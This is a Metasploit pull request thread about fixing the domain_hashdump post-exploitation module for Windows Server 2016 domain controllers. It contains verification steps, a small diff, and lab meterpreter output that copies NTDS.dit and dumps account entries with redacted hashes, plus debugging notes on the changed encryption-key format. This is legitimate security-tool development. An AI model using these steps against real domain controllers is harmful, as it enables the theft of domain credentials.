### PR TITLE
fix Windows server 2016 support for domain_hashdump

### PR DESCRIPTION
**Pull request by thelightcosine**
The domain hashdump post module should now work
against Server 2016 DCs.

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [ ] Get a shell on a Windows Server 2016 Domain Controller
- [ ] `use post/windows/gather/credentials/domain_hashdump`
- [ ]  `set SESSION <id>`
- [ ] run
- [ ] **Verify** you do not get a permissions error
- [ ] **Verify** you do not get an error that the OS is unspported

### CODE REVIEW

**Comment by sempervictus** [comment]
Got one in the lab, will give it a shot.

**Comment by sempervictus** [comment]
Not quite sure what's going on, but on a 2k8r2DC the normal hashdump module fails now, so does the meterp command/script. On the bright side, this seems to work properly on both 16 and 08.

File: modules/post/windows/gather/credentials/domain_hashdump.rb [hunk 1]
```diff
@@ -99,17 +101,22 @@ def ntdsutil_method
...
-    unless is_admin?
+    if is_admin?
+      print_status "Session has Admin privs"
+    else
       print_error "This module requires Admin privs to run"
       return false
     end
-    unless is_domain_controller?
+    if is_domain_controller?
+      print_status "Sessions is on a Domain Controller"
```
Comment (busterb) [inline modules/post/windows/gather/credentials/domain_hashdump.rb]: Why's the AG on the DC?

**Comment by bwatters-r7** [comment]
## Testing
### Windows 2016 DC
```
meterpreter > sysinfo
Computer        : APT_WIN2016X64
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > hashdump
Administrator:500:xxx:xxx:::
Guest:501:xxx:xxx:::
krbtgt:502:xxx:::
DefaultAccount:503:xxx:xxx:::
msfuser:1000:xxx:xxx:::
APT_WIN2016X64$:1001:xxx:::
meterpreter > 
```

**Comment by bwatters-r7** [comment]
## Testing
### WIndows 2016 DC
```
meterpreter > sysinfo
Computer        : APT_WIN2016X64
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 2...
msf exploit(psexec) > use post/windows/gather/credentials/domain_hashdump
msf post(domain_hashdump) > set session 2
session => 2
msf post(domain_hashdump) > run

[*] Session has Admin privs
[*] Session is on a Domain Controller
[*] Pre-conditions met, attempting to copy NTDS.dit
[*] Using NTDSUTIL method
[*] NTDS database copied to C:\Windows\Temp\hZdvgVKEz\Active Directory\ntds.dit
[*] NTDS File Size: 33554432 bytes
[*] Repairing NTDS database after copy...
[*] 
Initiating REPAIR mode...
        Database: C:\Windows\Temp\hZdvgVKEz\Active Directory\ntds.dit
  Temp. Database: TEMPREPAIR3464.EDB

Checking database integrity.

                     Scanning Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................


Integrity check successful.

Note:
  It is recommended that you immediately perform a full backup
  of this database. If you restore a backup made before the
  repair, the database will be rolled back to the state
  it was in at the time of that backup.

Operation completed successfully in 0.438 seconds.

[-] Post failed: Rex::Post::Meterpreter::RequestError extapi_ntds_parse: Operation failed: 1004
[-] Call stack:
[-]   /home/tmoose/rapid7/metasploit-framework/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb:26:in `parse'
[-]   /home/tmoose/rapid7/metasploit-framework/lib/metasploit/framework/ntds/parser.rb:22:in `initialize'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/windows/gather/credentials/domain_hashdump.rb:43:in `new'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/windows/gather/credentials/domain_hashdump.rb:43:in `run'
[*] Post module execution completed
msf post(domain_hashdump) > 
```

**Comment by bwatters-r7** [comment]
@dmaloney-r7 not sure why, but I keep getting that failure on my 2016 DC

**Comment by bwatters-r7** [comment]
### Windows 2008x64 SP1
```
meterpreter > sysinfo
Computer        : WIN-0TFH1T8N8B5
OS              : Windows 2008 (Build 6001, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(psexec) > use post/windows/gather/credentials/domain_hashdump 
msf post(domain_hashdump) > set session 1
session => 1
msf post(domain_hashdump) > run

[*] Session has Admin privs
[*] Session is on a Domain Controller
[*] Pre-conditions met, attempting to copy NTDS.dit
[*] Using NTDSUTIL method
[*] NTDS database copied to C:\Windows\Temp\RbAomiS\Active Directory\ntds.dit
[*] NTDS File Size: 12599296 bytes
[*] Repairing NTDS database after copy...
[*] 
Initiating REPAIR mode...
        Database: C:\Windows\Temp\RbAomiS\Active Directory\ntds.dit
  Temp. Database: TEMPREPAIR2960.EDB

Checking database integrity.

                     Scanning Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................


Integrity check successful.

Note:
  It is recommended that you immediately perform a full backup
  of this database. If you restore a backup made before the
  repair, the database will be rolled back to the state
  it was in at the time of that backup.

Operation completed successfully in 0.312 seconds.

[*] Started up NTDS channel. Preparing to stream results...
[+] Administrator (Built-in account for administering the computer/domain)
Administrator:500:xxx:xxx
Password Expires: Monday, January 01, 1601
Last Password Change: 8:00:06 PM Friday, September 08, 2017
Last Logon: 8:14:05 PM Friday, September 08, 2017
Logon Count: 5

Hash History:


[+]          Guest (Built-in account for guest access to the computer/domain)
         Guest:501:xxx:xxx
         Password Expires: Never
         Last Password Change: 12:00:00 AM Monday, January 01, 1601
         Last Logon: 12:00:00 AM Monday, January 01, 1601
         Logon Count: 0
          - Account Disabled
- Password Never Expires
- No Password Required

         Hash History:
         

[+] msfuser ()
msfuser:1000:xxx:xxx
Password Expires: Monday, January 01, 1601
Last Password Change: 5:56:05 PM Friday, June 02, 2017
Last Logon: 12:16:51 AM Saturday, June 03, 2017
Logon Count: 2

Hash History:


[+] krbtgt (Key Distribution Center Service Account)
krbtgt:502:xxx
Password Expires: r
Last Password Change: 8:07:20 PM Friday, September 08, 2017
Last Logon: 12:00:00 AM Monday, January 01, 1601
Logon Count: 0
 - Account Disabled

Hash History:
krbtgt:502:xxx


[*] Deleting backup of NTDS.dit at C:\Windows\Temp\RbAomiS\Active Directory\ntds.dit
[*] Post module execution completed
msf post(domain_hashdump) > 
```

**Comment by bwatters-r7** [comment]
@dmaloney-r7 ?

**Comment by busterb** [comment]
This looks like we need to add some debug message to the meterpreter side to see where it is setting bad flags.

**Comment by bwatters-r7** [comment]
I will leave some notes here on what I am finding:
I do not think this a framework problem.  The error code that comes back is 1004, and originally, I thought it was a Windows error, but after debugging meterpreter, that's a Jet database error code 1004, `The column has a NULL value.` It comes when the NTDS file is converted to a jet database and it tries to read the first column.  Given that the NTDS file that it grabs is 33 MB, my guess is there's a problem with the decoding or parsing.  I will continue digging.

**Comment by bwatters-r7** [comment]
Huh; so it turns out that this is semi-expected behavior.  There's a loop that tries to read and fails a lot, until it quits failing.  For 2016, it simply never stops failing.

**Comment by sempervictus** [comment]
Mmm... Unbounded failure </homer>

**Comment by bwatters-r7** [comment]
Hrm...... well, this is proving to be a pain.  So the catch is that the encryption key is not found by our current implementation, but the tag for it is still present in a hex dump of the database.... but it looks a _bit_ different.  

I ran around and played with a few different tools to see what I could find and if anyone else supported 2016.  I think this shows the problem:
```
brendan@ubuntu:~/git/ImpDump$ esentutl.py '/home/brendan/Desktop/2012_ntds.dit'  export -table datatable | grep -E "ATTk590689"
ATTk590689                    : '020000000100000017e9c2f9778f3a3a72d4a5fd4a8e44365779483b583dccf2e7fb96b49f6c1de10ab9c26b9cb979ed6a9617bc9052a7261fab49e0611a28e0251e9049e009478e06fbf737'
brendan@ubuntu:~/git/ImpDump$ esentutl.py '/home/brendan/Desktop/ntds_2016.mdb'  export -table datatable | grep -E "ATTk590689"
ATTk590689                    : '03000000010000002d31c238b7b3ad05a6e7d279446f25561e70f941f06cf320da740b498d8b2835c76846308a798d770efa2d5bb22c3ad3aecb735f4ec1c2ed9ddf6f4fc0458e61dbc1f2b1ed881bcdc4a19f0c62a0ace300000000000000000000000000000000'
```
The encryption keys are very different looking.  I was not able to find anyone who did support pulling hashes from 2016 via the ntds.dit database.  I would like to poke a bit more, but this is likely a longer-term project.

**Comment by bwatters-r7** [comment]
Migrated to new PR since I hijacked this and changed functionality: https://github.com/rapid7/metasploit-framework/pull/9211

**Pull request closed without merging**